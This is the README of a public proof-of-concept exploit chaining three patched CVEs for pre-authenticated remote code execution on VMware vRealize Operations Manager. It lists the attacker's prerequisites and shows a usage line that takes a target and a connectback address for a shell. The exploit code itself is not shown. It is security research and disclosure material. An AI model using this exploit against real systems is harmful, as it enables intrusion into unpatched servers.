DashOverride

What

This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901.

Author

Steven Seeley of Qihoo 360 Vulnerability Research Insititute

Tested

The exploit was tested against 8.6.3.19682901 using the file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) but it has known to work against other older versions as well.

Notes

• This exploit chains three vulnerabilities that have been patched. More details can be found in the blog post:

  • CVE-2022-31675 - MainPortalFilter ui Authentication Bypass
  • CVE-2022-31674 - SupportLogAction Information Disclosure
  • CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation

• This exploit will require the attacker to supply:

  • A valid dashboardlink token that will be used to bypass authentication.
  • Their own SMTP server settings, this is to ensure that exploitation works.
  • A valid Pak file that is signed by VMWare such as APUAT-8.5.0.18176777.pak.

• There is alot of moving parts to this exploit, hopefully I engineered it right so it works on the first shot.

• The exploit takes on average ~1m34.142s to complete (tested 5 times), I tried to engineer this to be faster, but it's within an allocated time for a competition ;->

Run

researcher@mars:~$ ./poc.py 
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9

Example